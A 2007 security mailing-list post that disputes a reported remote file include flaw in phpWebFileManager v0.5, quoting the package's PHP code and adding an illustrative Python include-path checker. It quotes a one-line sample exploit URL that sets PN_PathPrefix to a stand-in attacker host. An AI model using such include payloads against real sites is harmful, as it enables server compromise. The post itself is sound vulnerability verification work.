[VIM] WTF: phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability
George A. Theall
theall at tenablesecurity.com
Tue Jul 31 02:22:55 UTC 2007
Yet another advisory from ilker Kandemir:
http://archives.neohapsis.com/archives/bugtraq/2007-07/0366.html
Sample exploit:
index.php?PN_PathPrefix=http://attacker.txt?
Actual code from index.php from phpWebFileManager v0.5:
---- snip, snip, snip ----
$fm_init_file = dirname(__FILE__)
              . (strlen(dirname(__FILE__)) > 0 ? '/' : '')
              . 'init.inc.php';
if (! @file_exists($fm_init_file)) {
    exit;
}
require_once $fm_init_file;
/*
 * Libraries function inclusion
 */
require_once $PN_PathPrefix . 'functions.inc.php';
---- snip, snip, snip ----
So index.php first determines the location of its init.inc.php file and
then requires it.
Actual code from init.inc.php from phpWebFileManager v0.5:
---- snip, snip, snip ----
$ModName = null;
$PN_PathPrefix = '';
if (defined('LOADED_AS_MODULE')) {
    $ModName = basename(dirname(__FILE__));
    $PN_PathPrefix = "modules/$ModName/";
} else {
    $PN_PathPrefix = dirname(__FILE__);
    $PN_PathPrefix .= '/';
}
---- snip, snip, snip ----
init.inc.php includes several other files, but I didn't see any that
might allow an attacker to override $PN_PathPrefix via some sort of
register_globals emulation.
George
--
theall at tenablesecurity.com
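
The check made by hand in the post, as an added example (not part of the original message and not phpWebFileManager code): a Python sketch that walks index.php in statement order, follows the require of init.inc.php, and reports any include whose path uses a variable the code has not unconditionally assigned by then. The `scan` helper, its regex heuristics and the whitespace-condensed copies of the two excerpts are assumptions made for illustration.

```python
import re

# Matches, in source order, an include/require or a plain "=" assignment.
STMT = re.compile(r"\b(?:require|include)(?:_once)?\b\s*(?P<inc>[^;]+);"
                  r"|(?P<var>\$\w+)\s*=(?![=>])(?P<rhs>[^;]+);")
PHP_NAME = re.compile(r"['\"]([\w./-]+\.php)['\"]")

def scan(name, files, assigned=None, literal=None, seen=None):
    """List (file, include expr, unset vars) for each include whose path uses
    a variable the code has not unconditionally assigned by that point."""
    assigned = set() if assigned is None else assigned
    literal = {} if literal is None else literal
    seen = set() if seen is None else seen
    seen.add(name)
    src = re.sub(r"/\*.*?\*/", "", files[name], flags=re.S)  # drop comments
    findings = []
    for m in STMT.finditer(src):
        var, expr = m.group("var"), (m.group("inc") or "").strip()
        depth = src.count("{", 0, m.start()) - src.count("}", 0, m.start())
        if var:
            if depth == 0:  # inside a block = conditional, so not counted
                assigned.add(var)
                literal[var] = (PHP_NAME.findall(m.group("rhs")) or [None])[-1]
            continue
        used = re.findall(r"\$\w+", expr)
        unset = [v for v in used if v not in assigned]
        if unset:
            findings.append((name, expr, unset))
        # Follow the include when its target file name can be resolved.
        names = PHP_NAME.findall(expr)
        target = names[-1] if names else literal.get(used[0]) if used else None
        if target in files and target not in seen:
            findings += scan(target, files, assigned, literal, seen)
    return findings

# Constructed inputs: the two excerpts quoted in the post, whitespace condensed.
INDEX = """$fm_init_file = dirname(__FILE__)
    . (strlen(dirname(__FILE__)) > 0 ? '/' : '') . 'init.inc.php';
if (! @file_exists($fm_init_file)) { exit; }
require_once $fm_init_file;
/* Libraries function inclusion */
require_once $PN_PathPrefix . 'functions.inc.php';"""
INIT = """$ModName = null;
$PN_PathPrefix = '';
if (defined('LOADED_AS_MODULE')) {
    $ModName = basename(dirname(__FILE__));
    $PN_PathPrefix = "modules/$ModName/";
} else { $PN_PathPrefix = dirname(__FILE__); $PN_PathPrefix .= '/'; }"""
FILES = {"index.php": INDEX, "init.inc.php": INIT}
print(scan("index.php", FILES) or "no include uses an unset variable")
```

An empty result for these excerpts matches the reading in the post: the top-level assignment in init.inc.php runs before the flagged require_once, so a request-supplied value would be overwritten.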